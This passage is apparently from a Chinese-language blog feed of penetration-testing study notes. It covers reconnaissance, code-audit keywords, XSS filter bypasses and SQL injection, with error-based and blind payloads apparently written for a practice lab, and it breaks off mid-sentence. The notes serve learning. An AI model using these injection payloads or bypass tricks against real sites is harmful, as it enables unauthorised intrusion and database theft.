</span><span style="color: #C3E88D">smb</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">smbnt</span><span style="color: #BABED8"> </span></span><span class="line"><span style="color: #FFCB6B">http-</span><span style="color: #BABED8">{head</span><span style="color: #89DDFF">|</span><span style="color: #FFCB6B">get}</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">http-{get</span><span style="color: #89DDFF">|</span><span style="color: #FFCB6B">post}-formhttp-proxy</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">cisco</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">cisco-enable</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">vnc</span><span style="color: #BABED8"> </span></span><span class="line"><span style="color: #FFCB6B">ldap2</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">ldap3</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">mssql</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">mysql</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">oracle-listenerpostgres</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">nntp</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">socks5</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">rexec</span><span style="color: #BABED8"> </span></span><span class="line"><span style="color: #FFCB6B">rlogin</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">pcnfs</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">snmp</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">rsh</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">cvs</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">svn</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">icq</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">sapr3</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">sshsmtp-auth[-ntlm]</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">pcanywhere</span><span style="color: #BABED8"> </span></span><span class="line"><span style="color: #FFCB6B">teamspeak</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">sip</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">vmauthd</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">firebird</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">ncp</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">afp等等。</span></span></code></pre></div>]]></content>
<summary type="html"><h4 id="常见的端口服务"><a href="#常见的端口服务" class="headerlink" title="常见的端口服务"></a>常见的端口服务</h4><div class="language-txt"><button title="Copy code" c</summary>
<category term="网络安全" scheme="https://myprefer.github.io/tags/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/"/>
<category term="学习日志" scheme="https://myprefer.github.io/tags/%E5%AD%A6%E4%B9%A0%E6%97%A5%E5%BF%97/"/>
<category term="穷举爆破" scheme="https://myprefer.github.io/tags/%E7%A9%B7%E4%B8%BE%E7%88%86%E7%A0%B4/"/>
</entry>
<entry>
<title>信息收集</title>
<link href="https://myprefer.github.io/post/%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86.html"/>
<id>https://myprefer.github.io/post/%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86.html</id>
<published>2024-02-22T07:35:50.000Z</published>
<updated>2024-03-03T08:47:57.048Z</updated>
<content type="html"><![CDATA[<ul><li>信息收集是渗透测试的前提</li></ul><h4 id="whois域名注册信息查询"><a href="#whois域名注册信息查询" class="headerlink" title="whois域名注册信息查询"></a>whois域名注册信息查询</h4><ul><li>命令: whois <域名></li><li><a href="https://whois.aizhan.com/">站长工具_whois查询工具_爱站网</a></li><li><a href="https://www.webscan.cc/">同IP网站查询,C段查询,IP反查域名,在线C段,旁站工具 - WebScan</a></li><li><a href="https://www.tianyancha.com/">天眼查</a></li></ul><h4 id="文件和目录扫描工具"><a href="#文件和目录扫描工具" class="headerlink" title="文件和目录扫描工具"></a>文件和目录扫描工具</h4><ul><li>DirBuster</li><li>Pker</li><li>御剑后台扫描工具</li></ul><h4 id="子域名收集"><a href="#子域名收集" class="headerlink" title="子域名收集"></a>子域名收集</h4><h5 id="域名构成"><a href="#域名构成" class="headerlink" title="域名构成"></a>域名构成</h5><p>域名各部分由<code>.</code>分隔, 最右边的为一级域名(顶级域名, TLD, 如com, org等), 其左为二级域名(SLD), 以此类推</p><p>每级域名控制下一级域名的分配</p><p>子域名: 例如<code>space.bilibili.com</code>和<code>www.bilibili.com</code>是<code>bilibili.com</code>的子域名</p><h4 id="端口扫描"><a href="#端口扫描" class="headerlink" title="端口扫描"></a>端口扫描</h4><ol><li><p>端口扫描相关概念:端口->服务</p><blockquote><span class="custom-blockquote-svg"><svg width="24" height="24" viewBox="0 0 24 24" fill="" xmlns="http://www.w3.org/2000/svg" data-reactroot=""><path fill="" d="M22 12C22 6.5 17.5 2 12 2C6.5 2 2 6.5 2 12C2 17.5 6.5 22 12 22C13.8 22 15.5 21.5 17 20.6L22 22L20.7 17C21.5 15.5 22 13.8 22 12Z" undefined="1"></path><path fill="" d="M15.97 11.5H16.04C17.12 11.5 18 12.38 18 13.47V13.53C18 14.62 17.12 15.5 16.03 15.5H15.96C14.88 15.5 14 14.62 14 13.53V13.46C14 12.38 14.88 11.5 15.97 11.5Z" undefined="1"></path><path fill="" d="M7.97 11.5H8.04C9.12 11.5 10 12.38 10 13.47V13.53C10 14.62 9.12 15.5 8.03 15.5H7.97C6.88 15.5 6 14.62 6 13.53V13.46C6 12.38 6.88 11.5 7.97 11.5Z" undefined="1"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M17 8.5C15.23 8.97 14.07 10.84 14.01 13.27C14 13.33 14 13.4 14 13.47V13.5"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M9 8.5C7.23 8.97 6.07 10.84 6.01 13.27C6 13.33 6 13.4 6 13.47V13.5"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M15.97 11.5H16.04C17.12 11.5 18 12.38 18 13.47V13.53C18 14.62 17.12 15.5 16.03 15.5H15.96C14.88 15.5 14 14.62 14 13.53V13.46C14 12.38 14.88 11.5 15.97 11.5Z"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M7.97 11.5H8.04C9.12 11.5 10 12.38 10 13.47V13.53C10 14.62 9.12 15.5 8.03 15.5H7.97C6.88 15.5 6 14.62 6 13.53V13.46C6 12.38 6.88 11.5 7.97 11.5Z"></path></svg></span><p>一般在知道服务器开放了哪些端口后,就知道服务器开启了哪些服务。</p></blockquote></li><li><p>端口扫描的实</p><p>端口扫描包括向每个端口发送消息,一次只发送一个消息。接收到的回应类型表示是否在使用该端口并且可由此探寻弱点。</p></li><li><p>工具</p><ul><li><p>Nmap</p></li><li><p>御剑</p></li></ul><p><img src="https://i0.imgs.ovh/2024/02/23/SSlST.png" alt="SSlST.png"></p></li><li><p>常见开放端口及攻击方向</p><p><img src="https://i0.imgs.ovh/2024/02/23/SoaSs.png"></p><p><img src="https://i0.imgs.ovh/2024/02/23/SovdX.png"></p><p><img src="https://i0.imgs.ovh/2024/02/23/SSC2U.png" alt="SSC2U.png"></p><p><img src="https://i0.imgs.ovh/2024/02/23/SSPh0.png" alt="SSPh0.png"></p><p><img src="https://i0.imgs.ovh/2024/02/23/SSVUC.png" alt="SSVUC.png"></p><p><img src="https://i0.imgs.ovh/2024/02/23/SSXCt.png" alt="SSXCt.png"></p><p><img src="https://i0.imgs.ovh/2024/02/23/SSr6m.png" alt="SSr6m.png"></p></li></ol><h4 id="指纹识别"><a href="#指纹识别" class="headerlink" title="指纹识别"></a>指纹识别</h4><ul><li>识别出相应的Web容器或CMS才能查找与其相关的漏洞, 然后才能进行相应的渗透操作</li></ul><p><img src="https://i0.imgs.ovh/2024/02/23/SSY7p.png" alt="SSY7p.png"></p><h4 id="查找真实IP"><a href="#查找真实IP" class="headerlink" title="查找真实IP"></a>查找真实IP</h4><ul><li><p>判断是否使用CDN</p><ul><li><p>ping, 观察域名解析情况</p></li><li><p>在不同地区ping目标看解析ip是否一致</p><p><a href="https://17ce.com/">网站测速|网站速度测试|网速测试|电信|联通|网通|全国|监控|CDN|PING|DNS 一起测试|17CE.COM</a></p></li></ul></li><li><p>目标服务器不存在CDN</p><ul><li><a href="https://ip138.com/">iP地址查询–手机号码查询归属地 | 邮政编码查询 | iP地址归属地查询 | 身份证号码验证在线查询网 (ip138.com)</a></li></ul></li><li><p>存在CDN</p><ul><li>内部邮箱源</li><li>扫描网站测试文件, 如phpinfo, test等</li><li>分站域名, 二级域名可能没有挂CDN</li><li>国外代理访问</li><li>查询域名解析记录, 目标可能以前没有使用CDN: <a href="https://www.netcraft.com/">Netcraft | Leader in Phishing Detection, Cybercrime Disruption and Website Takedown</a></li><li>很多网站使用CloudFlare提供的CDN, 可以绕过CloudFlare CDN查找真实ip</li></ul></li><li><p>验证获取的IP</p><p>直接用获取到的IP访问, 看返回的页面是否和访问域名返回的一样</p></li></ul>]]></content>
<summary type="html"><ul>
<li>信息收集是渗透测试的前提</li>
</ul>
<h4 id="whois域名注册信息查询"><a href="#whois域名注册信息查询" class="headerlink" title="whois域名注册信息查询"></a>whois域名注册信息查询<</summary>
<category term="网络安全" scheme="https://myprefer.github.io/tags/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/"/>
<category term="学习日志" scheme="https://myprefer.github.io/tags/%E5%AD%A6%E4%B9%A0%E6%97%A5%E5%BF%97/"/>
<category term="信息收集" scheme="https://myprefer.github.io/tags/%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86/"/>
</entry>
<entry>
<title>代码审计</title>
<link href="https://myprefer.github.io/post/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1.html"/>
<id>https://myprefer.github.io/post/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1.html</id>
<published>2024-02-14T08:54:53.000Z</published>
<updated>2024-03-03T08:48:51.163Z</updated>
<content type="html"><![CDATA[<h3 id="概念"><a href="#概念" class="headerlink" title="概念"></a>概念</h3><p> 由具备丰富的编码经验并对安全编码及应用安全工具有很深刻理解的安全服务人员根据一定的代码规范和标准,针对应用程序源代码,从结构,脆弱性以及缺陷等方面进行审查,最终输出代码审计报告,完善应用程序,提升自身安全水平。</p><blockquote><span class="custom-blockquote-svg"><svg width="24" height="24" viewBox="0 0 24 24" fill="" xmlns="http://www.w3.org/2000/svg" data-reactroot=""><path fill="" d="M22 12C22 6.5 17.5 2 12 2C6.5 2 2 6.5 2 12C2 17.5 6.5 22 12 22C13.8 22 15.5 21.5 17 20.6L22 22L20.7 17C21.5 15.5 22 13.8 22 12Z" undefined="1"></path><path fill="" d="M15.97 11.5H16.04C17.12 11.5 18 12.38 18 13.47V13.53C18 14.62 17.12 15.5 16.03 15.5H15.96C14.88 15.5 14 14.62 14 13.53V13.46C14 12.38 14.88 11.5 15.97 11.5Z" undefined="1"></path><path fill="" d="M7.97 11.5H8.04C9.12 11.5 10 12.38 10 13.47V13.53C10 14.62 9.12 15.5 8.03 15.5H7.97C6.88 15.5 6 14.62 6 13.53V13.46C6 12.38 6.88 11.5 7.97 11.5Z" undefined="1"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M17 8.5C15.23 8.97 14.07 10.84 14.01 13.27C14 13.33 14 13.4 14 13.47V13.5"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M9 8.5C7.23 8.97 6.07 10.84 6.01 13.27C6 13.33 6 13.4 6 13.47V13.5"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M15.97 11.5H16.04C17.12 11.5 18 12.38 18 13.47V13.53C18 14.62 17.12 15.5 16.03 15.5H15.96C14.88 15.5 14 14.62 14 13.53V13.46C14 12.38 14.88 11.5 15.97 11.5Z"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M7.97 11.5H8.04C9.12 11.5 10 12.38 10 13.47V13.53C10 14.62 9.12 15.5 8.03 15.5H7.97C6.88 15.5 6 14.62 6 13.53V13.46C6 12.38 6.88 11.5 7.97 11.5Z"></path></svg></span><p><strong>步骤</strong>:</p><ol><li>配置审计分析环境</li><li>熟悉业务流程</li><li>分析程序架构</li><li><strong>工具自动化分析</strong></li><li><strong>人工审计结果</strong></li><li>整理审计报告</li></ol></blockquote><h3 id="思路"><a href="#思路" class="headerlink" title="思路"></a>思路</h3><ul><li>观察项目整体框架<ul><li>项目文件目录结构</li><li>明确每个文件的作用功能</li></ul></li><li>根据敏感<strong>关键字</strong>回溯参数传递过程</li><li>预定义的变量()<code>$_GET $_POST $_COOKIE $_SERVER $_ENV $_SESSION</code>等)</li><li>未初始化的变量(<code>regist_globle=on</code>)</li><li>变量覆盖</li><li>变量的传递存储(中转的变量)</li><li>文件包含(require,include,require_once,include_once`)</li><li>代码执行(<code>eval() assert()等</code>)</li><li>命令执行(<code>exec() shell_exec() system()等</code>)</li><li>SQL注入和XSS漏洞相关的关键字<ul><li>SQL注入(<code>select from、mysql_connect、mysql_query、mysql_fetch_row、update、insert、delete SET NAMES、character_set_client=gbk、mysql_set_charset('gbk’) urldecode、rawurldecode </code>)</li><li>XSS(<code>print、print_r、echo、printf、sprintf、die、var_dump、var_export等</code>)</li></ul></li><li>查找可控变量,追踪变量<strong>传递</strong>过程<ul><li>常见的可操控变量:<code>name、id、password、pwd、select、search</code></li></ul></li><li>寻找敏感<strong>功能点</strong>,通读功能点代码<ul><li>文件上传</li><li>文件管理</li><li>登录认证</li><li>密码管理</li></ul></li><li>有<strong>逻辑</strong>性、有<strong>目的</strong>性地通读全文代码<ul><li>目的性: 特别关注函数集文件、配置文件、安全过滤文件、index文件等重要文件</li></ul></li></ul><h3 id="目的"><a href="#目的" class="headerlink" title="目的"></a>目的</h3><ol><li>实现快速的漏洞扫描和修补</li><li>打造更加安全可靠的网络运行环境</li></ol><h3 id="代码审计工具"><a href="#代码审计工具" class="headerlink" title="代码审计工具"></a>代码审计工具</h3><h4 id="RIPS"><a href="#RIPS" class="headerlink" title="RIPS"></a>RIPS</h4><p><img src="https://i0.imgs.ovh/2024/02/17/ooi7T.png"></p><h4 id="SEAY"><a href="#SEAY" class="headerlink" title="SEAY"></a>SEAY</h4><p><img src="https://i0.imgs.ovh/2024/02/17/oSzBO.png"></p>]]></content>
<summary type="html"><h3 id="概念"><a href="#概念" class="headerlink" title="概念"></a>概念</h3><p> 由具备丰富的编码经验并对安全编码及应用安全工具有很深刻理解的安全服务人员根据一定的代码规范和标准,针对应用程序源代码,从结构,脆弱性以及缺</summary>
<category term="网络安全" scheme="https://myprefer.github.io/tags/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/"/>
<category term="学习日志" scheme="https://myprefer.github.io/tags/%E5%AD%A6%E4%B9%A0%E6%97%A5%E5%BF%97/"/>
<category term="WEB攻防" scheme="https://myprefer.github.io/tags/WEB%E6%94%BB%E9%98%B2/"/>
<category term="代码审计" scheme="https://myprefer.github.io/tags/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/"/>
</entry>
<entry>
<title>漏洞分类</title>
<link href="https://myprefer.github.io/post/%E6%BC%8F%E6%B4%9E%E5%88%86%E7%B1%BB.html"/>
<id>https://myprefer.github.io/post/%E6%BC%8F%E6%B4%9E%E5%88%86%E7%B1%BB.html</id>
<published>2024-02-14T08:23:14.000Z</published>
<updated>2024-03-03T08:48:32.114Z</updated>
<content type="html"><![CDATA[<h2 id="暴力破解漏洞"><a href="#暴力破解漏洞" class="headerlink" title="暴力破解漏洞"></a>暴力破解漏洞</h2><ul><li>通过系统地组合<strong>所有</strong>可能性(例如登录时用到的账户名、密码),尝试所有的可能性破解用户的账户名、密码等敏感信息,经常是使用<strong>自动化</strong>脚本组合出正确的用户名和密码。<br><strong>简单理解:</strong> 连续性尝试 + 字典 + 自动化</li></ul><h5 id="流程"><a href="#流程" class="headerlink" title="流程"></a>流程</h5><ul><li>确认登录接口的脆弱性<ul><li>比如:尝试登录–抓包–观察验证元素和response信息</li></ul></li><li>对字典进行优化<ul><li>根据注册提示信息进行优化</li><li>管理员</li></ul></li><li>工具自动化操作</li></ul><h2 id="XSS跨站脚本"><a href="#XSS跨站脚本" class="headerlink" title="XSS跨站脚本"></a>XSS跨站脚本</h2><h3 id="介绍"><a href="#介绍" class="headerlink" title="介绍"></a>介绍</h3><ul><li><p>跨站脚本,英文全称:Cross-Site Scripting</p></li><li><p>通过输入可以被解析的特殊字符串, 如</p><div class="language-html"><button title="Copy code" class="copy"></button><span class="lang">html</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #89DDFF"></</span><span style="color: #F07178">p</span><span style="color: #89DDFF">><</span><span style="color: #F07178">script</span><span style="color: #89DDFF">></span><span style="color: #82AAFF">alert</span><span style="color: #BABED8">(</span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">this is an alart</span><span style="color: #89DDFF">'</span><span style="color: #BABED8">)</span><span style="color: #89DDFF">;</</span><span style="color: #F07178">script</span><span style="color: #89DDFF">><</span><span style="color: #F07178">p</span><span style="color: #89DDFF">></span></span></code></pre></div><p>其中script标签内的代码会被执行</p></li><li><p>分类: 反射型XSS, 储存型XSS, DOM型XSS</p><ul><li><p>反射型XSS</p><ul><li><p>执行流程:</p><blockquote><span class="custom-blockquote-svg"><svg width="24" height="24" viewBox="0 0 24 24" fill="" xmlns="http://www.w3.org/2000/svg" data-reactroot=""><path fill="" d="M22 12C22 6.5 17.5 2 12 2C6.5 2 2 6.5 2 12C2 17.5 6.5 22 12 22C13.8 22 15.5 21.5 17 20.6L22 22L20.7 17C21.5 15.5 22 13.8 22 12Z" undefined="1"></path><path fill="" d="M15.97 11.5H16.04C17.12 11.5 18 12.38 18 13.47V13.53C18 14.62 17.12 15.5 16.03 15.5H15.96C14.88 15.5 14 14.62 14 13.53V13.46C14 12.38 14.88 11.5 15.97 11.5Z" undefined="1"></path><path fill="" d="M7.97 11.5H8.04C9.12 11.5 10 12.38 10 13.47V13.53C10 14.62 9.12 15.5 8.03 15.5H7.97C6.88 15.5 6 14.62 6 13.53V13.46C6 12.38 6.88 11.5 7.97 11.5Z" undefined="1"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M17 8.5C15.23 8.97 14.07 10.84 14.01 13.27C14 13.33 14 13.4 14 13.47V13.5"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M9 8.5C7.23 8.97 6.07 10.84 6.01 13.27C6 13.33 6 13.4 6 13.47V13.5"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M15.97 11.5H16.04C17.12 11.5 18 12.38 18 13.47V13.53C18 14.62 17.12 15.5 16.03 15.5H15.96C14.88 15.5 14 14.62 14 13.53V13.46C14 12.38 14.88 11.5 15.97 11.5Z"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M7.97 11.5H8.04C9.12 11.5 10 12.38 10 13.47V13.53C10 14.62 9.12 15.5 8.03 15.5H7.97C6.88 15.5 6 14.62 6 13.53V13.46C6 12.38 6.88 11.5 7.97 11.5Z"></path></svg></span><p>1、在输入点输入内容,构造恶意代码,输入点是以GET方式提交的,我们可以在URL中看到输入的内容<br>2、后端接收提交的数据,并没有对输入进行过滤<br>3、然后就将其呈现给了前端,浏览器执行了恶意代码</p></blockquote></li></ul></li><li><p>存储型XSS</p><ul><li><p>存储型XSS和反射型XSS区别就在于,存储型XSS是将恶意构造的代码存储在了数据库</p></li><li><p>执行流程:</p><blockquote><span class="custom-blockquote-svg"><svg width="24" height="24" viewBox="0 0 24 24" fill="" xmlns="http://www.w3.org/2000/svg" data-reactroot=""><path fill="" d="M22 12C22 6.5 17.5 2 12 2C6.5 2 2 6.5 2 12C2 17.5 6.5 22 12 22C13.8 22 15.5 21.5 17 20.6L22 22L20.7 17C21.5 15.5 22 13.8 22 12Z" undefined="1"></path><path fill="" d="M15.97 11.5H16.04C17.12 11.5 18 12.38 18 13.47V13.53C18 14.62 17.12 15.5 16.03 15.5H15.96C14.88 15.5 14 14.62 14 13.53V13.46C14 12.38 14.88 11.5 15.97 11.5Z" undefined="1"></path><path fill="" d="M7.97 11.5H8.04C9.12 11.5 10 12.38 10 13.47V13.53C10 14.62 9.12 15.5 8.03 15.5H7.97C6.88 15.5 6 14.62 6 13.53V13.46C6 12.38 6.88 11.5 7.97 11.5Z" undefined="1"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M17 8.5C15.23 8.97 14.07 10.84 14.01 13.27C14 13.33 14 13.4 14 13.47V13.5"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M9 8.5C7.23 8.97 6.07 10.84 6.01 13.27C6 13.33 6 13.4 6 13.47V13.5"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M15.97 11.5H16.04C17.12 11.5 18 12.38 18 13.47V13.53C18 14.62 17.12 15.5 16.03 15.5H15.96C14.88 15.5 14 14.62 14 13.53V13.46C14 12.38 14.88 11.5 15.97 11.5Z"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M7.97 11.5H8.04C9.12 11.5 10 12.38 10 13.47V13.53C10 14.62 9.12 15.5 8.03 15.5H7.97C6.88 15.5 6 14.62 6 13.53V13.46C6 12.38 6.88 11.5 7.97 11.5Z"></path></svg></span><p>1、在留言板处输入内容,构造恶意代码<br>2、将输入的内容,提交给后端代码执行,后端对输入过滤不严格,然后执行插入(insert)数据库操作<br>3、此时,我们的恶意代码已经保存在了数据库,<br>4、不管何时何地何人查看这条留言,都会被执行恶意代码,除非数据库中删除这条恶意代码</p></blockquote></li></ul></li><li><p>DOM型XSS</p><ul><li>基于文档对象模型的漏洞,可以动态的构造DOM节点</li><li>不经过后端代码,直接构造恶意代码,即可在前端展示</li></ul></li></ul></li></ul><h4 id="测试流程"><a href="#测试流程" class="headerlink" title="测试流程"></a>测试流程</h4><ol><li>在目标站点上找到输入点, 比如查询接口, 留言板等</li><li>输入一组“特殊字符+唯一识别字符”,点击提交后,查看返回的源码,是否有做对应的处理</li><li>通过搜索定位到唯一字符,结合唯一字符前后语法确认是否可以构造执行js的条件(构造闭合);</li><li>提交构造的脚本代码(以及各种绕过姿势),看是否可以成功执行,如果成功执行则说明存在XSS漏洞;</li></ol><h4 id="tips"><a href="#tips" class="headerlink" title="tips"></a>tips</h4><ol><li>一般查询接口容易出现反射型XSS,留言板容易出现存储型XSS</li><li>由于后台可能存在过滤措施,构造的script可能会被过滤掉,而无法生效,或者环境限制了执行(浏览器);</li><li>通过变化不同的script,尝试绕过后台过滤机制;</li></ol><h4 id="XSS绕过"><a href="#XSS绕过" class="headerlink" title="XSS绕过"></a>XSS绕过</h4><ul><li>转换<ul><li>大小写<code><ScRipT></code></li><li>拼凑<code><scr<script>ipt></code></li><li>注释<code><sc<!--a-->ript></code></li></ul></li><li>编码<ul><li>url编码</li><li>html编码</li></ul></li></ul><h2 id="SQL注入"><a href="#SQL注入" class="headerlink" title="SQL注入"></a>SQL注入</h2><h4 id="概述"><a href="#概述" class="headerlink" title="概述"></a>概述</h4><ul><li><p>攻击者可以通过合法输入点提交一些精心构造的语句, 从而欺骗后台数据库对其进行执行, 导致数据库信息泄露</p></li><li><p>例如:<br>正常输入: <code>1</code>, 执行<code>select password from users where id=1</code><br>非法输入:<code>1 or 1=1</code>, 执行<code>select password from users where id=1 or 1=1;</code><br>后者会输出表中的所有password</p></li></ul><h4 id="攻击流程"><a href="#攻击流程" class="headerlink" title="攻击流程"></a>攻击流程</h4><ol><li><p>注入点探测(自动/手动)</p><ul><li>判断注入点类型</li><li>判断查询列数</li><li>判断显示位置</li></ul></li><li><p>信息获取</p><ul><li><p>获取所有数据库名</p><blockquote><span class="custom-blockquote-svg"><svg width="24" height="24" viewBox="0 0 24 24" fill="" xmlns="http://www.w3.org/2000/svg" data-reactroot=""><path fill="" d="M22 12C22 6.5 17.5 2 12 2C6.5 2 2 6.5 2 12C2 17.5 6.5 22 12 22C13.8 22 15.5 21.5 17 20.6L22 22L20.7 17C21.5 15.5 22 13.8 22 12Z" undefined="1"></path><path fill="" d="M15.97 11.5H16.04C17.12 11.5 18 12.38 18 13.47V13.53C18 14.62 17.12 15.5 16.03 15.5H15.96C14.88 15.5 14 14.62 14 13.53V13.46C14 12.38 14.88 11.5 15.97 11.5Z" undefined="1"></path><path fill="" d="M7.97 11.5H8.04C9.12 11.5 10 12.38 10 13.47V13.53C10 14.62 9.12 15.5 8.03 15.5H7.97C6.88 15.5 6 14.62 6 13.53V13.46C6 12.38 6.88 11.5 7.97 11.5Z" undefined="1"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M17 8.5C15.23 8.97 14.07 10.84 14.01 13.27C14 13.33 14 13.4 14 13.47V13.5"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M9 8.5C7.23 8.97 6.07 10.84 6.01 13.27C6 13.33 6 13.4 6 13.47V13.5"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M15.97 11.5H16.04C17.12 11.5 18 12.38 18 13.47V13.53C18 14.62 17.12 15.5 16.03 15.5H15.96C14.88 15.5 14 14.62 14 13.53V13.46C14 12.38 14.88 11.5 15.97 11.5Z"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M7.97 11.5H8.04C9.12 11.5 10 12.38 10 13.47V13.53C10 14.62 9.12 15.5 8.03 15.5H7.97C6.88 15.5 6 14.62 6 13.53V13.46C6 12.38 6.88 11.5 7.97 11.5Z"></path></svg></span><p>一次性显示全部:group_concat(字段名)</p><p>逐一显示: limit</p></blockquote></li><li><p>获取某数据库所有表名</p></li><li><p>获取某库某表中所有字段名</p></li><li><p>获取字段的数据</p></li></ul></li><li><p>获取权限</p></li></ol><h4 id="注入点类型"><a href="#注入点类型" class="headerlink" title="注入点类型"></a>注入点类型</h4><ul><li>数字型</li><li>字符型: <code>'xxx'</code></li><li>搜索型: <code>%xxx%</code></li></ul><p><em>根据类型进行构造闭合</em></p><h4 id="基于union联合查询的信息获取"><a href="#基于union联合查询的信息获取" class="headerlink" title="基于union联合查询的信息获取"></a>基于union联合查询的信息获取</h4><ul><li>查询列数必须相同</li></ul><h4 id="判断查询列数"><a href="#判断查询列数" class="headerlink" title="判断查询列数"></a>判断查询列数</h4><ul><li>order by: 按照指定字段名进行排序</li></ul><h4 id="基于报错信息获取"><a href="#基于报错信息获取" class="headerlink" title="基于报错信息获取"></a>基于报错信息获取</h4><ul><li>使用一些指定的函数来制造报错, 从报错信息中获取特定的信息</li><li>背景条件: 后台没有屏蔽报错信息, 在语法发生错误时会输出在前端</li></ul><h5 id="报错函数"><a href="#报错函数" class="headerlink" title="报错函数"></a>报错函数</h5><ul><li><p><code>updatexml()</code></p><div class="language-sql"><button title="Copy code" class="copy"></button><span class="lang">sql</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #BABED8">updatexml(xml_document, XPathstring, new_value)</span></span><span class="line"><span style="color: #BABED8">#第一个参数: 表中的字段名(字符串)</span></span><span class="line"><span style="color: #BABED8">#第二个参数:Xpath格式的字符串</span></span><span class="line"><span style="color: #BABED8">#String格式,替换查找到的符合条件的</span></span></code></pre></div><p>**”XPath定位必须是有效的, 否则会发送错误”**可以利用这一点制造报错信</p><p>例如<code>updatexml(1,concat(0x7e,database(),0))</code>会产生报错信息, 其中有<code>database()</code>执行的结果</p></li><li><p><code>extractvalue()</code></p><div class="language-sql"><button title="Copy code" class="copy"></button><span class="lang">sql</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #BABED8">extractvalue(xml_document, xpath_string)</span></span><span class="line"><span style="color: #BABED8">#同样通过xpath产生报错</span></span></code></pre></div></li><li><p><code>floor()</code><br>取整函数, 示例:</p><div class="language-sql"><button title="Copy code" class="copy"></button><span class="lang">sql</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #BABED8">xxx</span><span style="color: #89DDFF">'</span><span style="color: #C3E88D"> and (select 2 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a)#</span></span></code></pre></div></li></ul><h4 id="盲注"><a href="#盲注" class="headerlink" title="盲注"></a>盲注</h4><ul><li>后台屏蔽了报错信息, 无法根据报错进行注入的判断 </li><li>分类<ul><li>基于真假, 例:<code>vince' and ascii(substr(database(),1,1))=112#</code></li><li>基于时间, 例:<code>vince' and if((ascii(substr(database(),1,1)))=112,sleep(5),null)#</code></li></ul></li><li>通过<code>ascii(substr((xx语句), n, n))=x</code>判断</li></ul><h4 id="宽字节注入"><a href="#宽字节注入" class="headerlink" title="宽字节注入"></a>宽字节注入</h4><ul><li>后端对输入的内容进行了转义, <code>'</code>转义为<code>\'</code>使原本的payload<code>vince' or 1=1 ;#</code>无法使用</li><li>由于mysql使用gbk编码, 单引号转义后编码为<code>%5c%27</code>, 